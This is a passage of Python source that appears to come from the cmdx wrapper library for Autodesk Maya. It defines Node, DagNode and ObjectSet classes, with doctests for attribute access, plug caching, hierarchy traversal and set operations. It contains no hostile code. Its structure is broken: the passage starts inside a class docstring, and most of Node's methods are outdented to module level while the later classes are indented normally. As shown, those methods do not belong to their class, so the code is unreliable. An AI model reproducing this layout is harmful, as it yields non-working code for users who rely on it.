        >>> transform["tx"] = 5
        >>> transform["worldMatrix"][0] >> decompose["inputMatrix"]
        >>> decompose["outputTranslate"]
        (5.0, 0.0, 0.0)

    """

    # The API 2.0 function set used to operate on the wrapped MObject.
    _Fn = om.MFnDependencyNode

    # Module-level cache of previously created instances of Node
    _Cache = dict()
def __eq__(self, other):
    """MObject supports this operator explicitly"""
    try:
        # Better to ask forgiveness than permission
        return self._mobject == other._mobject
    except AttributeError:
        # `other` is not a cmdx Node; fall back to string comparison.
        return str(self) == str(other)

def __ne__(self, other):
    # Mirror of __eq__, with the same string fallback.
    try:
        return self._mobject != other._mobject
    except AttributeError:
        return str(self) != str(other)

def __str__(self):
    # Namespaced node name, e.g. "ns:myNode".
    return self.name(namespace=True)

def __repr__(self):
    return self.name(namespace=True)

def __add__(self, other):
    """Support legacy + '.attr' behavior

    Example:
        >>> node = createNode("transform")
        >>> getAttr(node + ".tx")
        0.0
        >>> delete(node)

    """
    return self[other.strip(".")]

def __contains__(self, other):
    """Does the attribute `other` exist?"""
    return self.hasAttr(other)
def __getitem__(self, key):
    """Get plug from self

    Arguments:
        key (str, tuple): String lookup of attribute,
            optionally pass tuple to include unit.

    Example:
        >>> node = createNode("transform")
        >>> node["translate"] = (1, 1, 1)
        >>> node["translate", Meters]
        (0.01, 0.01, 0.01)

    """
    unit = None
    cached = False

    # The key may carry modifiers, e.g. node["tx", Meters, Cached].
    if isinstance(key, (list, tuple)):
        key, items = key[0], key[1:]

        for item in items:
            if isinstance(item, _Unit):
                unit = item
            elif isinstance(item, _Cached):
                cached = True

    if cached:
        try:
            # Serve the previously read value without touching Maya.
            return CachedPlug(self._state["values"][key, unit])
        except KeyError:
            # Nothing cached for this key/unit; fall through to a live read.
            pass

    try:
        plug = self.findPlug(key)
    except RuntimeError:
        raise ExistError("%s.%s" % (self.path(), key))

    return Plug(self, plug, unit=unit, key=key, modifier=self._modifier)
def __setitem__(self, key, value):
    """Support item assignment of new attributes or values

    Example:
        >>> _ = cmds.file(new=True, force=True)
        >>> node = createNode("transform", name="myNode")
        >>> node["myAttr"] = Double(default=1.0)
        >>> node["myAttr"] == 1.0
        True
        >>> node["rotateX", Degrees] = 1.0
        >>> node["rotateX"] = Degrees(1)
        >>> node["rotateX", Degrees]
        1.0
        >>> node["myDist"] = Distance()
        >>> node["myDist"] = node["translateX"]
        >>> node["myDist", Centimeters] = node["translateX", Meters]
        >>> round(node["rotateX", Radians], 3)
        0.017
        >>> node["myDist"] = Distance()
        Traceback (most recent call last):
        ...
        ExistError: myDist
        >>> node["notExist"] = 5
        Traceback (most recent call last):
        ...
        ExistError: |myNode.notExist
        >>> delete(node)

    """
    # Assigning one plug to another copies its current value.
    if isinstance(value, Plug):
        value = value.read()

    unit = None
    if isinstance(key, (list, tuple)):
        key, unit = key

        # Convert value to the given unit
        if isinstance(value, (list, tuple)):
            value = list(unit(v) for v in value)
        else:
            value = unit(value)

    # Create a new attribute
    elif isinstance(value, (tuple, list)):
        if isinstance(value[0], type):
            if issubclass(value[0], _AbstractAttribute):
                Attribute, kwargs = value
                attr = Attribute(key, **kwargs)

                try:
                    return self.addAttr(attr.create())

                except RuntimeError:
                    # NOTE: I can't be sure this is the only occasion
                    # where this exception is thrown. Stay cautious.
                    raise ExistError(key)

    try:
        plug = self.findPlug(key)
    except RuntimeError:
        raise ExistError("%s.%s" % (self.path(), key))

    plug = Plug(self, plug, unit=unit)

    if not getattr(self._modifier, "isDone", True):
        # Only a few attribute types are supported by a modifier
        if _python_to_mod(value, plug, self._modifier._modifier):
            return
        else:
            log.warning(
                "Could not write %s via modifier, writing directly.."
                % plug
            )

    # Else, write it immediately
    plug.write(value)
def _onDestroyed(self, mobject):
    # Called by Maya when the MObject is destroyed; after this point
    # any API access through self._mobject would be fatal.
    self._destroyed = True

    om.MMessage.removeCallbacks(self._state["callbacks"])

    for callback in self.onDestroyed:
        try:
            callback(self)
        except Exception:
            # User callbacks must never break teardown; report and move on.
            traceback.print_exc()

    # Drop any per-node scratch data tied to this hex code.
    _data.pop(self.hex, None)

def _onRemoved(self, mobject, modifier, _=None):
    # Called when the node is deleted from the scene; it may still
    # exist in memory (e.g. for undo), hence a separate flag.
    self._removed = True

    for callback in self.onRemoved:
        try:
            callback()
        except Exception:
            traceback.print_exc()

def __delitem__(self, key):
    # Support `del node["myAttr"]`.
    self.deleteAttr(key)
@withTiming()
def __init__(self, mobject, exists=True, modifier=None):
    """Initialise Node

    Private members:
        mobject (om.MObject): Wrap this MObject
        fn (om.MFnDependencyNode): The corresponding function set
        modifier (om.MDagModifier, optional): Operations are
            deferred to this modifier.
        destroyed (bool): Has this node been destroyed by Maya?
        state (dict): Optional state for performance

    """
    self._mobject = mobject
    self._fn = self._Fn(mobject)
    self._modifier = modifier
    self._destroyed = False
    self._removed = False
    self._hashCode = None
    # Per-node caches: found plugs, read values, registered callback ids.
    self._state = {
        "plugs": dict(),
        "values": dict(),
        "callbacks": list()
    }

    # Callbacks
    self.onDestroyed = list()
    self.onRemoved = list()

    Stats.NodeInitCount += 1

    self._state["callbacks"] += [
        # Monitor node deletion, to prevent accidental
        # use of MObject past its lifetime which may
        # result in a fatal crash.
        om.MNodeMessage.addNodeDestroyedCallback(
            mobject,
            self._onDestroyed,  # func
            None  # clientData
        ) if not ROGUE_MODE else 0,

        om.MNodeMessage.addNodeAboutToDeleteCallback(
            mobject,
            self._onRemoved,
            None
        ),
    ]
def plugin(self):
    """Return the user-defined class of the plug-in behind this node"""
    return type(self._fn.userNode())

def instance(self):
    """Return the current plug-in instance of this node"""
    return self._fn.userNode()

def object(self):
    """Return MObject of this node"""
    return self._mobject

def isAlive(self):
    """The node exists somewhere in memory"""
    return not self._destroyed

@property
def data(self):
    """Special handling for data stored in the instance

    Normally, the initialisation of data could happen in the __init__,
    but for some reason the postConstructor of a custom plug-in calls
    __init__ twice for every unique hex, which causes any data added
    there to be wiped out once the postConstructor is done.

    """
    return _data[self.hex]

@property
def destroyed(self):
    # True once Maya has destroyed the underlying MObject.
    return self._destroyed

@property
def exists(self):
    """The node exists in both memory *and* scene

    Example:
        >>> node = createNode("joint")
        >>> node.exists
        True
        >>> cmds.delete(str(node))
        >>> node.exists
        False
        >>> node.destroyed
        False
        >>> _ = cmds.file(new=True, force=True)
        >>> node.exists
        False
        >>> node.destroyed
        True

    """
    return not self._removed

@property
def removed(self):
    # True once the node has been deleted from the scene.
    return self._removed

@property
def hashCode(self):
    """Return MObjectHandle.hashCode of this node

    This a guaranteed-unique integer (long in Python 2)
    similar to the UUID of Maya 2016

    """
    return self._hashCode

@property
def hexStr(self):
    """Return unique hashCode as hexadecimal string

    Example:
        >>> node = createNode("transform")
        >>> node.hexStr == format(node.hashCode, "x")
        True

    """
    return self._hexStr

# Alias
code = hashCode
hex = hexStr
@property
def typeId(self):
    """Return the native maya.api.MTypeId of this node

    Example:
        >>> node = createNode("transform")
        >>> node.typeId == tTransform
        True

    """
    return self._fn.typeId

@property
def typeName(self):
    return self._fn.typeName

def isA(self, type):
    """Evaluate whether self is of `type`

    Arguments:
        type (int): MFn function set constant

    Example:
        >>> node = createNode("transform")
        >>> node.isA(kTransform)
        True
        >>> node.isA(kShape)
        False

    """
    return self._mobject.hasFn(type)

def lock(self, value=True):
    # Lock (or unlock, with value=False) the node itself
    self._fn.isLocked = value

def isLocked(self):
    return self._fn.isLocked

@property
def storable(self):
    """Whether or not to save this node with the file"""
    # How is this value queried? The API only exposes the setter
    # (setDoNotWrite below), so the getter returns None for now.
    return None

@storable.setter
def storable(self, value):
    # The original function is a double negative:
    # storable=True -> doNotWrite=False
    self._fn.setDoNotWrite(not bool(value))
# Plug lookup results are cached per-node; see docstring below
@withTiming("findPlug() reuse {time:.4f} ns")
def findPlug(self, name, cached=False):
    """Cache previously found plugs, for performance

    Cost: 4.9 microseconds/call

    Part of the time taken in querying an attribute is the
    act of finding a plug given its name as a string.

    This causes a 25% reduction in time taken for repeated
    attribute queries. Though keep in mind that state is stored
    in the `cmdx` object which currently does not survive rediscovery.
    That is, if a node is created and later discovered through a call
    to `encode`, then the original and discovered nodes carry one
    state each.

    Additional challenges include storing the same plug for both
    long and short name of said attribute, which is currently not
    the case.

    Arguments:
        name (str): Name of plug to find
        cached (bool, optional): Return cached plug, or
            throw an exception. Default to False, which
            means it will run Maya's findPlug() and cache
            the result.

    Example:
        >>> node = createNode("transform")
        >>> node.findPlug("translateX", cached=True)
        Traceback (most recent call last):
        ...
        KeyError: "'translateX' not cached"
        >>> plug1 = node.findPlug("translateX")
        >>> isinstance(plug1, om.MPlug)
        True
        >>> plug1 is node.findPlug("translateX")
        True
        >>> plug1 is node.findPlug("translateX", cached=True)
        True

    """
    plugs = self._state["plugs"]

    # Fast path: plug was looked up before
    if name in plugs:
        Stats.PlugReuseCount += 1
        return plugs[name]

    if cached:
        raise KeyError("'%s' not cached" % name)

    # Slow path: ask Maya, then remember the answer
    plug = self._fn.findPlug(name, False)
    plugs[name] = plug

    return plug
def update(self, attrs):
    """Apply a series of attributes all at once

    This operates similar to a Python dictionary.

    Arguments:
        attrs (dict): Key/value pairs of name and attribute

    Examples:
        >>> node = createNode("transform")
        >>> node.update({"tx": 5.0, ("ry", Degrees): 30.0})
        >>> node["tx"]
        5.0

    """
    # Delegate each assignment to __setitem__
    for key in attrs:
        self[key] = attrs[key]
def clear(self):
    """Clear transient state

    A node may cache previously queried values for performance
    at the expense of memory. This method erases any cached
    values, freeing up memory at the expense of performance.

    Example:
        >>> node = createNode("transform")
        >>> node["translateX"] = 5
        >>> node["translateX"]
        5.0
        >>> # Plug was reused
        >>> node["translateX"]
        5.0
        >>> # Value was reused
        >>> node.clear()
        >>> node["translateX"]
        5.0
        >>> # Plug and value was recomputed

    """
    # Only the caches are emptied; registered callbacks are kept
    for cache in ("plugs", "values"):
        self._state[cache].clear()
@protected
def name(self, namespace=False):
    """Return the name of this node

    Arguments:
        namespace (bool, optional): Return with namespace,
            defaults to False

    Example:
        >>> node = createNode("transform", name="myName")
        >>> node.name()
        u'myName'

    """
    full = self._fn.name()

    if namespace:
        return full

    # Strip any namespace prefix, e.g. "ns:node" -> "node"
    return full.rsplit(":", 1)[-1]
def namespace(self):
    """Get namespace of node

    Example:
        >>> _ = cmds.file(new=True, force=True)
        >>> node = createNode("transform", name="myNode")
        >>> node.namespace()
        u''
        >>> _ = cmds.namespace(add=":A")
        >>> _ = cmds.namespace(add=":A:B")
        >>> node = createNode("transform", name=":A:B:myNode")
        >>> node.namespace()
        u'A:B'
        """
    name = self._fn.name()

    # A name without ":" has no namespace. Return an empty
    # string of the *same* type as the name (str or unicode),
    # e.g. Ryan_:leftHand -> Ryan_, but leftHand -> ''
    if ":" not in name:
        return type(name)()

    return name.rsplit(":", 1)[0]
# Alias
def path(self):
    # For a DG node the "path" is simply its namespaced name;
    # DagNode overrides this with a full DAG path
    return self.name(namespace=True)

shortestPath = path

def pop(self, key):
    """Delete an attribute

    Arguments:
        key (str): Name of attribute to delete

    Example:
        >>> node = createNode("transform")
        >>> node["myAttr"] = Double()
        >>> node.pop("myAttr")
        >>> node.hasAttr("myAttr")
        False

    """
    # Delegates to __delitem__
    del self[key]
def dump(self, ignore_error=True):
    """Return dictionary of all attributes

    Example:
        >>> import json
        >>> _ = cmds.file(new=True, force=True)
        >>> node = createNode("choice")
        >>> dump = node.dump()
        >>> isinstance(dump, dict)
        True
        >>> dump["choice1.caching"]
        False

    """
    result = {}

    for index in range(self._fn.attributeCount()):
        attribute = self._fn.attribute(index)
        mplug = self._fn.findPlug(attribute, False)

        try:
            value = Plug(self, mplug).read()
        except (RuntimeError, TypeError):
            # TODO: Support more types of attributes,
            # such that this doesn't need to happen.
            if not ignore_error:
                raise

            value = None

        result[mplug.name()] = value

    return result
def dumps(self, indent=4, sortKeys=True):
    """Return a JSON compatible dictionary of all attributes"""
    payload = self.dump()
    return json.dumps(payload, indent=indent, sort_keys=sortKeys)
def type(self):
    """Return type name

    Example:
        >>> node = createNode("choice")
        >>> node.type()
        u'choice'

    """
    # Same value as the `typeName` property
    return self._fn.typeName
def addAttr(self, attr):
    """Add a new dynamic attribute to node

    Arguments:
        attr (Plug): Add this attribute

    Example:
        >>> node = createNode("transform")
        >>> attr = Double("myAttr", default=5.0)
        >>> node.addAttr(attr)
        >>> node["myAttr"] == 5.0
        True

    """
    # Accept both a cmdx attribute description and a raw MObject
    mobj = attr.create() if isinstance(attr, _AbstractAttribute) else attr
    self._fn.addAttribute(mobj)
def hasAttr(self, attr):
    """Return whether or not `attr` exists

    Arguments:
        attr (str): Name of attribute to check

    Example:
        >>> node = createNode("transform")
        >>> node.hasAttr("mysteryAttribute")
        False
        >>> node.hasAttr("translateX")
        True
        >>> node["myAttr"] = Double()  # Dynamic attribute
        >>> node.hasAttr("myAttr")
        True

    """
    # Covers both static and dynamic attributes
    return self._fn.hasAttribute(attr)
def deleteAttr(self, attr):
    """Delete `attr` from node

    Arguments:
        attr (Plug): Attribute to remove

    Example:
        >>> node = createNode("transform")
        >>> node["myAttr"] = Double()
        >>> node.deleteAttr("myAttr")
        >>> node.hasAttr("myAttr")
        False

    """
    # A plain string is resolved to a Plug via __getitem__
    plug = attr if isinstance(attr, Plug) else self[attr]
    self._fn.removeAttribute(plug._mplug.attribute())
def connections(self, type=None, unit=None, plugs=False):
    """Yield plugs of node with a connection to any other plug

    Arguments:
        unit (int, optional): Return plug in this unit,
            e.g. Meters or Radians
        type (str, optional): Restrict output to nodes of this type,
            e.g. "transform" or "mesh"
        plugs (bool, optional): Return plugs, rather than nodes

    Example:
        >>> _ = cmds.file(new=True, force=True)
        >>> a = createNode("transform", name="A")
        >>> b = createNode("multDoubleLinear", name="B")
        >>> a["ihi"] << b["ihi"]
        >>> list(a.connections()) == [b]
        True
        >>> list(b.connections()) == [a]
        True
        >>> a.connection() == b
        True

    """
    for mplug in self._fn.getConnections():
        node = Node(mplug.node())

        # Optionally restrict to connections on nodes of `type`
        if type and type != node._fn.typeName:
            continue

        wrapped = Plug(node, mplug, unit)
        for connection in wrapped.connections(plugs=plugs):
            yield connection
def connection(self, type=None, unit=None, plug=False):
    """Singular version of :func:`connections()`"""
    # `plug` is forwarded positionally to the `plugs` argument
    return next(self.connections(type, unit, plug), None)

def rename(self, name):
    # Defer to an active modifier when one is mid-edit,
    # otherwise rename immediately via a throwaway MDGModifier
    if not getattr(self._modifier, "isDone", True):
        return self._modifier.rename(self, name)

    mod = om.MDGModifier()
    mod.renameNode(self._mobject, name)
    mod.doIt()

if ENABLE_PEP8:
    # snake_case aliases for the camelCase API above
    is_alive = isAlive
    hex_str = hexStr
    hash_code = hashCode
    type_id = typeId
    type_name = typeName
    is_a = isA
    is_locked = isLocked
    find_plug = findPlug
    add_attr = addAttr
    has_attr = hasAttr
    delete_attr = deleteAttr
    shortest_path = shortestPath
class DagNode(Node):
    """A Maya DAG node

    The difference between this and Node is that a DagNode
    can have one or more children and one parent (multiple
    parents not supported).

    Example:
        >>> _ = cmds.file(new=True, force=True)
        >>> parent = createNode("transform")
        >>> child = createNode("transform", parent=parent)
        >>> child.parent() == parent
        True
        >>> next(parent.children()) == child
        True
        >>> parent.child() == child
        True
        >>> sibling = createNode("transform", parent=parent)
        >>> child.sibling() == sibling
        True
        >>> shape = createNode("mesh", parent=child)
        >>> child.shape() == shape
        True
        >>> shape.parent() == child
        True

    """

    _Fn = om.MFnDagNode

    def __str__(self):
        return self.path()

    def __repr__(self):
        return self.path()

    def __init__(self, mobject, *args, **kwargs):
        super(DagNode, self).__init__(mobject, *args, **kwargs)

        # Transform function set, used by the limit methods below
        self._tfn = om.MFnTransform(mobject)

    @protected
    def path(self):
        """Return full path to node

        Example:
            >>> parent = createNode("transform", "myParent")
            >>> child = createNode("transform", "myChild", parent=parent)
            >>> child.name()
            u'myChild'
            >>> child.path()
            u'|myParent|myChild'

        """
        return self._fn.fullPathName()

    @protected
    def dagPath(self):
        """Return a om.MDagPath for this node

        Example:
            >>> _ = cmds.file(new=True, force=True)
            >>> parent = createNode("transform", name="Parent")
            >>> child = createNode("transform", name="Child", parent=parent)
            >>> path = child.dagPath()
            >>> str(path)
            'Child'
            >>> str(path.pop())
            'Parent'

        """
        return om.MDagPath.getAPathTo(self._mobject)

    @protected
    def shortestPath(self):
        """Return shortest unique path to node

        Example:
            >>> _ = cmds.file(new=True, force=True)
            >>> parent = createNode("transform", name="myParent")
            >>> child = createNode("transform", name="myChild", parent=parent)
            >>> child.shortestPath()
            u'myChild'
            >>> child = createNode("transform", name="myChild")
            >>> # Now `myChild` could refer to more than a single node
            >>> child.shortestPath()
            u'|myChild'

        """
        return self._fn.partialPathName()

    @property
    def level(self):
        """Return the number of parents this DAG node has

        Example:
            >>> parent = createNode("transform")
            >>> child = createNode("transform", parent=parent)
            >>> child.level
            1
            >>> parent.level
            0

        """
        # A full path always starts with "|", hence the -1
        return self.path().count("|") - 1

    @property
    def boundingBox(self):
        """Return a cmdx.BoundingBox of this DAG node"""
        return BoundingBox(self._fn.boundingBox)

    def hide(self):
        """Set visibility to False"""
        self["visibility"] = False

    def show(self):
        """Set visibility to True"""
        self["visibility"] = True

    def addChild(self, child, index=Last):
        """Add `child` to self

        Arguments:
            child (Node): Child to add
            index (int, optional): Physical location in hierarchy,
                defaults to cmdx.Last

        Example:
            >>> parent = createNode("transform")
            >>> child = createNode("transform")
            >>> parent.addChild(child)

        """
        mobject = child._mobject
        self._fn.addChild(mobject, index)

    def assembly(self):
        """Return the top-level parent of node

        Example:
            >>> parent1 = createNode("transform")
            >>> parent2 = createNode("transform")
            >>> child = createNode("transform", parent=parent1)
            >>> grandchild = createNode("transform", parent=child)
            >>> child.assembly() == parent1
            True
            >>> parent2.assembly() == parent2
            True

        """
        path = self._fn.getPath()

        # Pop all the way up to the node directly below the world;
        # a node with no parents keeps root=None and returns itself
        root = None
        for level in range(path.length() - 1):
            root = path.pop()

        return self.__class__(root.node()) if root else self

    def transform(self, space=sObject, time=None):
        """Return TransformationMatrix"""
        plug = self["worldMatrix"][0] if space == sWorld else self["matrix"]
        return TransformationMatrix(plug.asMatrix(time))

    def mapFrom(self, other, time=None):
        """Return TransformationMatrix of `other` relative self

        Example:
            >>> a = createNode("transform")
            >>> b = createNode("transform")
            >>> a["translate"] = (0, 5, 0)
            >>> b["translate"] = (0, -5, 0)
            >>> delta = a.mapFrom(b)
            >>> delta.translation()[1]
            10.0
            >>> a = createNode("transform")
            >>> b = createNode("transform")
            >>> a["translate"] = (0, 5, 0)
            >>> b["translate"] = (0, -15, 0)
            >>> delta = a.mapFrom(b)
            >>> delta.translation()[1]
            20.0

        """
        a = self["worldMatrix"][0].asMatrix(time)
        b = other["worldInverseMatrix"][0].asMatrix(time)
        delta = a * b
        return TransformationMatrix(delta)

    def mapTo(self, other, time=None):
        """Return TransformationMatrix of self relative `other`

        See :func:`mapFrom` for examples.

        """
        return other.mapFrom(self, time)

    # Alias
    root = assembly

    def parent(self, type=None):
        """Return parent of node

        Arguments:
            type (str, optional): Return parent, only if it matches this type

        Example:
            >>> parent = createNode("transform")
            >>> child = createNode("transform", parent=parent)
            >>> child.parent() == parent
            True
            >>> not child.parent(type="camera")
            True
            >>> parent.parent()

        """
        mobject = self._fn.parent(0)

        # Top-level nodes are parented to the world; treat as "no parent"
        if mobject.apiType() == om.MFn.kWorld:
            return

        cls = self.__class__

        if not type or type == self._fn.__class__(mobject).typeName:
            return cls(mobject)

    def children(self,
                 type=None,
                 filter=om.MFn.kTransform,
                 query=None,
                 contains=None):
        """Return children of node

        All returned children are transform nodes, as specified by the
        `filter` argument. For shapes, use the :func:`shapes` method.
        The `contains` argument only returns transform nodes containing
        a shape of the type provided.

        Arguments:
            type (str, optional): Return only children that match this type
            filter (int, optional): Return only children with this function set
            contains (str, optional): Child must have a shape of this type
            query (dict, optional): Limit output to nodes with these attributes

        Example:
            >>> _ = cmds.file(new=True, force=True)
            >>> a = createNode("transform", "a")
            >>> b = createNode("transform", "b", parent=a)
            >>> c = createNode("transform", "c", parent=a)
            >>> d = createNode("mesh", "d", parent=c)
            >>> list(a.children()) == [b, c]
            True
            >>> a.child() == b
            True
            >>> c.child(type="mesh")
            >>> c.child(type="mesh", filter=None) == d
            True
            >>> c.child(type=("mesh", "transform"), filter=None) == d
            True
            >>> a.child() == b
            True
            >>> a.child(contains="mesh") == c
            True
            >>> a.child(contains="nurbsCurve") is None
            True
            >>> b["myAttr"] = Double(default=5)
            >>> a.child(query=["myAttr"]) == b
            True
            >>> a.child(query=["noExist"]) is None
            True
            >>> a.child(query={"myAttr": 5}) == b
            True
            >>> a.child(query={"myAttr": 1}) is None
            True

        """
        # Shapes have no children
        if self.isA(kShape):
            return

        cls = DagNode
        Fn = self._fn.__class__

        # Tuples/lists of types use membership, single types use equality
        op = operator.eq
        if isinstance(type, (tuple, list)):
            op = operator.contains

        # Compare against typeId for MTypeId filters, typeName otherwise
        other = "typeId" if isinstance(type, om.MTypeId) else "typeName"

        for index in range(self._fn.childCount()):
            try:
                mobject = self._fn.child(index)

            except RuntimeError:
                # TODO: Unsure of exactly when this happens
                log.warning(
                    "Child %d of %s not found, this is a bug" % (index, self)
                )
                raise

            if filter is not None and not mobject.hasFn(filter):
                continue

            if not type or op(type, getattr(Fn(mobject), other)):
                node = cls(mobject)

                if not contains or node.shape(type=contains):
                    if query is None:
                        yield node

                    elif isinstance(query, dict):
                        try:
                            if all(node[key] == value
                                   for key, value in query.items()):
                                yield node
                        except ExistError:
                            continue

                    else:
                        if all(key in node for key in query):
                            yield node

    def child(self,
              type=None,
              filter=om.MFn.kTransform,
              query=None,
              contains=None):
        return next(self.children(type, filter, query, contains), None)

    def shapes(self, type=None, query=None):
        return self.children(type, kShape, query)

    def shape(self, type=None):
        return next(self.shapes(type), None)

    def siblings(self, type=None, filter=om.MFn.kTransform):
        parent = self.parent()

        if parent is not None:
            for child in parent.children(type=type, filter=filter):
                if child != self:
                    yield child

    def sibling(self, type=None, filter=None):
        return next(self.siblings(type, filter), None)

    # This conditional is evaluated once, at class-definition time,
    # choosing the fastest implementation available in this Maya version.
    if hasattr(om, "MItDag"):
        def descendents(self, type=None):
            """Faster and more efficient dependency graph traversal

            Requires Maya 2017+

            Example:
                >>> grandparent = createNode("transform")
                >>> parent = createNode("transform", parent=grandparent)
                >>> child = createNode("transform", parent=parent)
                >>> mesh = createNode("mesh", parent=child)
                >>> it = grandparent.descendents(type=tMesh)
                >>> next(it) == mesh
                True
                >>> next(it)
                Traceback (most recent call last):
                ...
                StopIteration

            """
            type = type or om.MFn.kInvalid
            typeName = None

            # Support filtering by typeName
            if isinstance(type, string_types):
                typeName = type
                type = om.MFn.kInvalid

            it = om.MItDag(om.MItDag.kDepthFirst, om.MFn.kInvalid)
            it.reset(
                self._mobject,
                om.MItDag.kDepthFirst,
                om.MIteratorType.kMObject
            )

            it.next()  # Skip self

            while not it.isDone():
                mobj = it.currentItem()
                node = DagNode(mobj)

                if typeName is None:
                    if not type or type == node._fn.typeId:
                        yield node
                else:
                    if not typeName or typeName == node._fn.typeName:
                        yield node

                it.next()

    else:
        def descendents(self, type=None):
            """Recursive, depth-first search; compliant with MItDag of 2017+

            Example:
                >>> grandparent = createNode("transform")
                >>> parent = createNode("transform", parent=grandparent)
                >>> child = createNode("transform", parent=parent)
                >>> mesh = createNode("mesh", parent=child)
                >>> it = grandparent.descendents(type=tMesh)
                >>> next(it) == mesh
                True
                >>> next(it)
                Traceback (most recent call last):
                ...
                StopIteration

            """
            def _descendents(node, children=None):
                children = children or list()
                children.append(node)
                for child in node.children(filter=None):
                    _descendents(child, children)

                return children

            # Support filtering by typeName.
            # Use string_types (not bare str) for consistency with the
            # MItDag branch above, so Python 2 unicode filters also work
            typeName = None
            if isinstance(type, string_types):
                typeName = type
                type = om.MFn.kInvalid

            descendents = _descendents(self)[1:]  # Skip self

            for child in descendents:
                if typeName is None:
                    if not type or type == child._fn.typeId:
                        yield child
                else:
                    if not typeName or typeName == child._fn.typeName:
                        yield child

    def descendent(self, type=om.MFn.kInvalid):
        """Singular version of :func:`descendents()`

        A recursive, depth-first search.

        .. code-block:: python

            a
            |
            b---d
            |   |
            c   e

        Example:
            >>> _ = cmds.file(new=True, force=True)
            >>> a = createNode("transform", "a")
            >>> b = createNode("transform", "b", parent=a)
            >>> c = createNode("transform", "c", parent=b)
            >>> d = createNode("transform", "d", parent=b)
            >>> e = createNode("transform", "e", parent=d)
            >>> a.descendent() == a.child()
            True
            >>> list(a.descendents()) == [b, c, d, e]
            True
            >>> f = createNode("mesh", "f", parent=e)
            >>> list(a.descendents(type="mesh")) == [f]
            True

        """
        return next(self.descendents(type), None)

    def duplicate(self):
        """Return a duplicate of self"""
        return self.__class__(self._fn.duplicate())

    def clone(self, name=None, parent=None, worldspace=False):
        """Return a clone of self

        A "clone" assignes the .outMesh attribute of a mesh node
        to the `.inMesh` of the resulting clone.

        Supports:
            - mesh

        Arguments:
            name (str, optional): Name of newly created clone
            parent (DagNode, optional): Parent to newly cloned node
            worldspace (bool, optional): Translate output to worldspace

        """
        if self.isA(kShape) and self.typeName == "mesh":
            assert parent is not None, "mesh cloning requires parent argument"

            # BUGFIX: the computed fallback name was previously discarded,
            # leaving `name` as None when the caller omitted it
            name = name or parent.name() + "Clone"

            with DagModifier() as mod:
                mesh = mod.createNode("mesh", name, parent)
                mesh["inMesh"] << self["outMesh"]

            return mesh

        else:
            raise TypeError("Unsupported clone target: %s" % self)

    def isLimited(self, typ):
        return self._tfn.isLimited(typ)

    def limitValue(self, typ):
        return self._tfn.limitValue(typ)

    def enableLimit(self, typ, state):
        return self._tfn.enableLimit(typ, state)

    def setLimit(self, typ, value):
        return self._tfn.setLimit(typ, value)

    if ENABLE_PEP8:
        # snake_case aliases for the camelCase API above
        shortest_path = shortestPath
        add_child = addChild
        dag_path = dagPath
        map_from = mapFrom
        map_to = mapTo
        is_limited = isLimited
        limit_value = limitValue
        set_limit = setLimit
        enable_limit = enableLimit
        bounding_box = boundingBox

    # MFnTransform Limit Types, for use with the limit methods above
    kRotateMaxX = 13
    kRotateMaxY = 15
    kRotateMaxZ = 17
    kRotateMinX = 12
    kRotateMinY = 14
    kRotateMinZ = 16
    kScaleMaxX = 1
    kScaleMaxY = 3
    kScaleMaxZ = 5
    kScaleMinX = 0
    kScaleMinY = 2
    kScaleMinZ = 4
    kShearMaxXY = 7
    kShearMaxXZ = 9
    kShearMaxYZ = 11
    kShearMinXY = 6
    kShearMinXZ = 8
    kShearMinYZ = 10
    kTranslateMaxX = 19
    kTranslateMaxY = 21
    kTranslateMaxZ = 23
    kTranslateMinX = 18
    kTranslateMinY = 20
    kTranslateMinZ = 22
class ObjectSet(Node):
    """Support set-type operations on Maya sets

    Caveats
        1. MFnSet was introduced in Maya 2016, this class backports
        that behaviour for Maya 2015 SP3

        2. Adding a DAG node as a DG node persists its function set
        such that when you query it, it'll return the name rather
        than the path.

        Therefore, when adding a node to an object set, it's important
        that it is added as either a DAG or DG node depending on what
        it is. This class manages this automatically.

    """

    @protected
    def shortestPath(self):
        # Object sets are DG nodes; their "path" is the namespaced name
        return self.name(namespace=True)

    def __iter__(self):
        for member in self.members():
            yield member

    def add(self, member):
        """Add single `member` to set

        Arguments:
            member (cmdx.Node): Node to add

        """
        return self.update([member])

    def remove(self, members):
        # Removal goes through the API 1.0 MFnSet,
        # since API 2.0 lacked MFnSet prior to Maya 2016 (see class docstring)
        mobj = _encode1(self.name(namespace=True))
        selectionList = om1.MSelectionList()

        if not isinstance(members, (tuple, list)):
            selectionList.add(members.path())

        else:
            for member in members:
                selectionList.add(member.path())

        fn = om1.MFnSet(mobj)
        fn.removeMembers(selectionList)

    def update(self, members):
        """Add several `members` to set

        Arguments:
            members (list): Series of cmdx.Node instances

        """
        # forceElement removes members from any other exclusive set
        cmds.sets(list(map(str, members)), forceElement=self.path())

    def clear(self):
        """Remove all members from set"""
        mobj = _encode1(self.name(namespace=True))
        fn = om1.MFnSet(mobj)
        fn.clear()

    def sort(self, key=lambda o: (o.typeName, o.path())):
        """Sort members of set by `key`

        Arguments:
            key (lambda): See built-in `sorted(key)` for reference

        """
        members = sorted(
            self.members(),
            key=key
        )

        # Re-adding members in sorted order determines the stored order
        self.clear()
        self.update(members)

    def descendent(self, type=None):
        """Return the first descendent"""
        return next(self.descendents(type), None)

    def descendents(self, type=None):
        """Return hierarchy of objects in set"""
        for member in self.members(type=type):
            yield member

            try:
                for child in member.descendents(type=type):
                    yield child

            except AttributeError:
                # Plain DG members have no descendents() method
                continue

    def flatten(self, type=None):
        """Return members, converting nested object sets into its members

        Example:
            >>> from maya import cmds
            >>> _ = cmds.file(new=True, force=True)
            >>> a = cmds.createNode("transform", name="a")
            >>> b = cmds.createNode("transform", name="b")
            >>> c = cmds.createNode("transform", name="c")
            >>> cmds.select(a)
            >>> gc = cmds.sets([a], name="grandchild")
            >>> cc = cmds.sets([gc, b], name="child")
            >>> parent = cmds.sets([cc, c], name="parent")
            >>> mainset = encode(parent)
            >>> sorted(mainset.flatten(), key=lambda n: n.name())
            [|a, |b, |c]

        """
        members = set()

        # Depth-first expansion of nested sets
        def recurse(objset):
            for member in objset:
                if member.isA(om.MFn.kSet):
                    recurse(member)
                elif type is not None:
                    if type == member.typeName:
                        members.add(member)
                else:
                    members.add(member)

        recurse(self)
        return list(members)

    def member(self, type=None):
        """Return the first member"""
        return next(self.members(type), None)

    def members(self, type=None):
        # Single types compare by equality, tuples/lists by membership;
        # string filters compare typeName, others compare typeId
        op = operator.eq
        other = "typeId"

        if isinstance(type, string_types):
            other = "typeName"

        if isinstance(type, (tuple, list)):
            op = operator.contains

        for node in cmds.sets(self.name(namespace=True), query=True) or []:
